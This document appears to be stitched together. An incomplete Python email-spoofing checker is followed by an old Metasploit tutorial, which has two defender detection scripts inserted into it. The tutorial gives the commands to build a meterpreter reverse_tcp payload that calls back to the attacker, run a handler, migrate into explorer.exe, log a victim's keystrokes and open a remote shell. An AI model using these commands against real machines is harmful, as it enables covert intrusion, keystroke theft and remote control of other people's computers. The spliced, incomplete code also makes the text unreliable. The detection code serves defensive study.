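# Assumed mapping from the sender domains named in the article to the host domain of the
# servers that hand their mail over; extend it for other providers.
SENDING_HOSTS = {"gmail.com": "google.com", "yahoo.com": "yahoo.com", "hotmail.com": "outlook.com"}


def domain_of(header_value) -> str:
    """Domain part of an address header such as From or Return-Path, lowercased."""
    _, address = parseaddr(header_value or "")
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def spoof_indicators(raw: str) -> list:
    """Human-readable findings; an empty list means nothing in the headers contradicts From."""
    msg = message_from_string(raw)
    from_dom = domain_of(msg.get("From"))
    rp_dom = domain_of(msg.get("Return-Path"))
    findings = []
    if rp_dom and rp_dom != from_dom:
        findings.append(f"Return-Path domain '{rp_dom}' does not match From domain '{from_dom}'")
    received = msg.get_all("Received") or []
    expected = SENDING_HOSTS.get(from_dom)
    if received and expected:
        # The topmost Received line was added by our own server; its "from" host is whoever
        # connected to deliver the mail, which for genuine Gmail is a google.com server.
        tokens = received[0].split()
        hop = tokens[1].lower() if len(tokens) > 1 and tokens[0].lower() == "from" else ""
        if not (hop == expected or hop.endswith("." + expected)):
            findings.append(f"delivered by '{hop}', not a {expected} server, although From claims {from_dom}")
    if msg.get("X-PHP-Originating-Script"):
        findings.append("X-PHP-Originating-Script present: sent by PHP mail(), not by a webmail provider")
    return findings


if __name__ == "__main__":
    print(spoof_indicators(GENUINE))   # []
    for finding in spoof_indicators(SPOOFED):
        print("-", finding)
```

Only the topmost Received line is trusted here because the lower ones are written by earlier hops and can themselves be forged by the sender.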

Metasploit Tutorial - With an example | Exploiting the vulnerabilities

--- The Metasploit Framework ---

Note: This is an advanced topic. Read carefully. Feel free to ask any kind of question; we are always here to help you.

If you are really interested in network security, chances are you have heard of Metasploit over the last few years.
Now, have you ever wondered what someone could do to your PC just by knowing your IP? Here's the answer. He could 0wn you, or in other words, he could have full access to your PC, provided you have just a few security loopholes, which may arise from as simple a reason as not updating your Flash player last week when it prompted you to.
Metasploit is a hacker's best friend, mainly because it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods.
The topic of Metasploit is very vast in itself. However, I'll try to keep it basic and simple so that everyone here can understand it. Also, Metasploit can be used together with several other tools such as Nmap or Nessus (all of these tools are present in BackTrack).
In this tutorial I'll be teaching you how to exploit a system using a Meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of the Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you must know them):

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited, resulting in notable damage.
Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or a DoS attack on the target.
Overflow: An error caused when a program tries to store data beyond the size of its buffer. It may be used by an attacker to execute malicious code.
Payload: The actual code which runs on the compromised system after exploitation.
Now, what IS Metasploit?
It is an open source penetration testing framework used for developing and executing attacks against target systems. It has a huge database of exploits, and it can also be used to write our own 0-day exploits.

Metasploit has a great collection of anti-forensics tools, which make forensic analysis of the compromised computer a little more difficult. They are released as part of MAFIA (Metasploit Anti-Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
I would recommend using the MSF Console because of its effectiveness and power from a pentester's point of view. Another advantage of this mode is that several msfconsole sessions can be run simultaneously.
I would recommend doing the following things in Metasploit on BackTrack (a system or an image), avoiding the Windows version of the tool.
For those who don't know, BackTrack is a Linux distro made especially for security personnel, including all the tools required by a pentester.
Download BackTrack from here. You can download the ISO or the VMware image, whichever you are comfortable with. If you have physical access to more than one system, go for the ISO image and install it on your hard disk.
Let the hacking begin:
Open up BackTrack. You should have a screen similar to this.

The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~# /etc/init.d/wicd start
to start the wicd network manager.
Finally, type "startx" to start the GUI mode:

First of all, find out your local IP. Open up a konsole (on the bottom left of the taskbar) and type in:
It would be something like 192.168.x.x or 10.x.x.x.
Make a note of it.
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now have a shell, something similar to a command prompt in Windows.
msf >
Let's now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window ("Session>>New Shell" or click on the small icon on the left of the shell tab in the bottom left corner of the window):
root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST="your local ip" LPORT="any port you wish" x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier, and for the port you could select 4444.
(Everything has to be entered without quotes.)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=,LPORT=4444
Also, you would now see a reverse_tcp.exe file on your Backtrack machine (it was written to /root).

Transfer it to your other computer on the same local network using a thumb drive or by uploading it online.

Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you,
and now you have set up the handler to listen for the meterpreter session on port 4444.
The last step you have to do now is to type in "exploit" and press enter:
msf exploit(handler) > exploit

[*] Started reverse handler on
[*] Starting the payload handler...
Now, the handler is listening for all incoming connections on port 4444.
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 1 opened ( -> at Sun Mar 13 11:32:12 -0400 2011
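A defender's view of the handler set-up above: the stager connects back to LHOST:LPORT and then receives the stage (the "Sending stage (749056 bytes)" line). The following Python is an added example that is not part of the original article; it scans constructed connection-summary log lines for outbound sessions to the handler port used here (4444) and for a stage-sized inbound transfer right after connect. The log format, the sample lines and the thresholds are assumptions made for illustration.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample connection-summary log (not from the article). The
# key=value format is an assumption made for this example; the first line
# mimics a stager calling back to a handler on port 4444 and pulling a
# meterpreter-sized stage (the article's handler reported 749056 bytes).
SAMPLE_LOG = """\
2011-03-13T11:32:10 proto=tcp src=192.168.1.23 dst=192.168.1.10 dport=4444 bytes_in=749120 bytes_out=1034
2011-03-13T11:32:11 proto=tcp src=192.168.1.23 dst=93.184.216.34 dport=443 bytes_in=52310 bytes_out=2210
2011-03-13T11:35:40 proto=tcp src=192.168.1.45 dst=192.168.1.10 dport=4444 bytes_in=120 bytes_out=90
2011-03-13T11:40:02 proto=tcp src=192.168.1.23 dst=192.168.1.10 dport=8080 bytes_in=751000 bytes_out=900
"""

# Thresholds are assumptions for illustration: 4444 is the port the article
# uses for its handler; the stage-size window brackets the 749056-byte stage.
HANDLER_PORTS = {4444}
STAGE_MIN_BYTES = 500_000
STAGE_MAX_BYTES = 2_000_000
MAX_CLIENT_BYTES = 8_192  # a fresh stager sends very little before the stage arrives

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kv>.+)$")


@dataclass
class Conn:
    ts: str
    src: str
    dst: str
    dport: int
    bytes_in: int   # bytes the remote side sent to the internal host
    bytes_out: int  # bytes the internal host sent


def parse_line(line: str) -> Optional[Conn]:
    """Parse one key=value connection record; return None for malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields: Dict[str, str] = {}
    for tok in m.group("kv").split():
        if "=" not in tok:
            return None
        k, v = tok.split("=", 1)
        fields[k] = v
    try:
        return Conn(ts=m.group("ts"), src=fields["src"], dst=fields["dst"],
                    dport=int(fields["dport"]), bytes_in=int(fields["bytes_in"]),
                    bytes_out=int(fields["bytes_out"]))
    except (KeyError, ValueError):
        return None


def indicators(conn: Conn) -> List[str]:
    """Return the reverse-callback indicators a connection matches."""
    hits = []
    if conn.dport in HANDLER_PORTS:
        hits.append("handler-port")
    if STAGE_MIN_BYTES <= conn.bytes_in <= STAGE_MAX_BYTES and conn.bytes_out <= MAX_CLIENT_BYTES:
        hits.append("stage-sized-download")
    return hits


def find_callbacks(log_text: str) -> List[Dict[str, object]]:
    """One alert per connection matching any indicator.

    Both indicators together is 'high'; a stage-sized download on an arbitrary
    port is 'medium' (a handler can listen on any port); the port alone is 'low'.
    """
    alerts = []
    for line in log_text.splitlines():
        conn = parse_line(line)
        if conn is None:
            continue
        hits = indicators(conn)
        if not hits:
            continue
        if len(hits) == 2:
            severity = "high"
        elif "stage-sized-download" in hits:
            severity = "medium"
        else:
            severity = "low"
        alerts.append({"ts": conn.ts, "src": conn.src, "dst": conn.dst,
                       "dport": conn.dport, "indicators": hits, "severity": severity})
    return alerts


if __name__ == "__main__":
    for a in find_callbacks(SAMPLE_LOG):
        print(f'{a["ts"]} {a["src"]} -> {a["dst"]}:{a["dport"]} [{a["severity"]}] {", ".join(a["indicators"])}')
```

The port rule alone is weak, since the attacker can pick any LPORT; the byte-count rule is what catches the sample on port 8080, which is why the two are scored separately.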

You would see a meterpreter prompt like this:
meterpreter >
Type in ps to list the active processes:
meterpreter > ps

Search for explorer.exe in the list, note its PID (5716 in this example) and migrate into that process:
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >
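The migrate step above moves the implant into explorer.exe by creating a thread in that process. On the host side, Sysmon records such events as Event ID 8 (CreateRemoteThread) with a SourceImage and a TargetImage. The following Python is an added example, not part of the original article: it triages constructed, flattened Event ID 8 records and flags threads injected into long-lived processes from binaries living outside trusted install paths (such as a reverse_tcp.exe dropped on a desktop). The flat key=value rendering, the sample lines, the trusted-path list and the target list are assumptions for illustration.

```python
import ntpath
from typing import Dict, List

# Constructed, flattened rendering of Sysmon Event ID 8 (CreateRemoteThread)
# records. Real Sysmon events are XML; this key=value form is an assumption
# for the example. Line 2 mimics a dropped reverse_tcp.exe migrating into
# explorer.exe (PID 5716, as in the article's migrate step).
SAMPLE_EVENTS = """\
EventID=8 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\explorer.exe SourceProcessId=812 TargetProcessId=5716
EventID=8 SourceImage=C:\\Users\\victim\\Desktop\\reverse_tcp.exe TargetImage=C:\\Windows\\explorer.exe SourceProcessId=3020 TargetProcessId=5716
EventID=1 Image=C:\\Windows\\System32\\notepad.exe ProcessId=5428 ParentProcessId=5716
EventID=8 SourceImage=C:\\ProgramData\\Updater\\svc.exe TargetImage=C:\\Windows\\System32\\lsass.exe SourceProcessId=4100 TargetProcessId=640
"""

# Assumed policy: binaries under these trees are treated as trusted sources...
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# ...except world-writable directories that sit inside a trusted tree.
WRITABLE_EXCEPTIONS = ("c:\\windows\\temp\\",)
# Long-lived processes an implant commonly migrates into (explorer.exe is the
# one the article uses; the others are an assumption).
MIGRATION_TARGETS = {"explorer.exe", "svchost.exe", "winlogon.exe", "lsass.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Split one flattened record into a field dict (values contain no spaces here)."""
    fields: Dict[str, str] = {}
    for tok in line.strip().split():
        if "=" in tok:
            k, v = tok.split("=", 1)
            fields[k] = v
    return fields


def source_is_trusted(path: str) -> bool:
    """True when the source binary lives in a trusted, non-writable install tree."""
    p = path.lower()
    if p.startswith(WRITABLE_EXCEPTIONS):
        return False
    return p.startswith(TRUSTED_PREFIXES)


def find_suspicious_remote_threads(text: str) -> List[Dict[str, object]]:
    """Return Event ID 8 records where an untrusted binary injects into a migration target."""
    alerts = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "8":
            continue
        target = ntpath.basename(ev.get("TargetImage", "")).lower()
        if target not in MIGRATION_TARGETS:
            continue
        source = ev.get("SourceImage", "")
        if source_is_trusted(source):
            continue
        alerts.append({
            "source": source,
            "source_pid": int(ev["SourceProcessId"]),
            "target": target,
            "target_pid": int(ev["TargetProcessId"]),
        })
    return alerts


if __name__ == "__main__":
    for a in find_suspicious_remote_threads(SAMPLE_EVENTS):
        print(f'{a["source"]} (pid {a["source_pid"]}) -> {a["target"]} (pid {a["target_pid"]})')
```

A path allowlist is a coarse first filter; in practice it is paired with signer and hash checks, but it is enough to surface the article's scenario, where the injecting binary sits on a user's desktop.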

Type in the following:
meterpreter > use priv
Now, if you want to start the keylogger on the victim, just type keyscan_start.

Now, if you want a command shell on the victim's computer,
just type shell:
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

You would now have a command prompt.
Type in whoami to see the victim's computer name and user name:
win7-pc\win 7

Let's suppose you want to start notepad on the victim's computer.
Type in:
Let's say the victim has typed something on his computer.
Just type exit to return to meterpreter.
Now type in keyscan_dump to see all the captured keystrokes:
meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R
P.S.: The above information is for educational purposes only. You should test it only against computers you own.

About Author: This is a guest article written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH Certified Ethical Hacker. His main areas of expertise include online privacy issues, web application security and wireless hacking. You can connect with him on Facebook here.